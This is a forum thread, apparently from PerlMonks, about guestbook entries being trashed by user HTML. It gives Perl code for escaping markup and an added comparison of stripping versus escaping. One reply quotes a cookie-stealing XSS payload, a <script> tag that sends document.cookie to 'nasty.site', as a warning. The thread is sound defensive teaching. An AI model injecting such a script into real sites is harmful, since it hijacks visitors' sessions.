in reply to Emergency! Our guestbook is getting trashed by HTML!

Setting $allow_html to 0 will *attempt* to remove HTML. It will fail if the person supplies a < without a matching >. Fixing it would be convoluted. It's easier to just escape < and >:

if ($allow_html != 1) {
    $value =~ s/</&lt;/g;   # a literal '<' can no longer open a tag
    $value =~ s/>/&gt;/g;   # a literal '>' can no longer close one
}

Better yet, have a look at secure versions of Matt's scripts.
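As an added illustration (not code from the original post or from Matt's scripts), the following compares the "strip HTML" approach with escaping on a few constructed guestbook entries, including the unmatched '<' case the post warns about. The function names and sample entries are my own.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Naive strip, the approach $allow_html = 0 takes: delete anything that
# looks like a tag. With no closing '>' the regex never matches, so an
# unterminated tag is passed through to the browser untouched.
sub strip_tags {
    my ($value) = @_;
    $value =~ s/<[^>]*>//g;
    return $value;
}

# Escape instead: every character that can start markup or an entity is
# turned into a literal entity, so nothing the visitor typed is parsed as
# HTML. (HTML::Entities::encode_entities does the same job if installed.)
sub escape_html {
    my ($value) = @_;
    $value =~ s/&/&amp;/g;   # first, so the entities below are not double-escaped
    $value =~ s/</&lt;/g;
    $value =~ s/>/&gt;/g;
    $value =~ s/"/&quot;/g;  # matters when the value lands inside an attribute
    $value =~ s/'/&#39;/g;
    return $value;
}

# Constructed guestbook entries (not taken from the thread).
my @entries = (
    'Nice site! <b>Thanks</b>',      # ordinary markup
    'I think 1 < 2 and 3 > 2',       # strip eats " 2 and 3 " as if it were a tag
    'Oops <b unterminated',          # no '>' at all: strip leaves the tag start in place
);

for my $e (@entries) {
    printf "raw:    %s\nstrip:  %s\nescape: %s\n\n",
        $e, strip_tags($e), escape_html($e);
}
```

The second entry shows that stripping also mangles harmless text, while the third shows the dangling tag that will swallow whatever page markup follows it; escaping renders all three exactly as typed.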

Re^2: Emergency! Our guestbook is getting trashed by HTML!
by amw1 (Friar) on Dec 17, 2004 at 16:53 UTC
    This or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvenient, this can be even worse:
    <script> document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.cookie </script>
    Take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad".

    In short: never display uncooked user input in a web page unless you have a very good reason to.

      Yah, you should look at http://www.shocking.com/~rsnake/xss.html. There are a lot of risks there, it seems.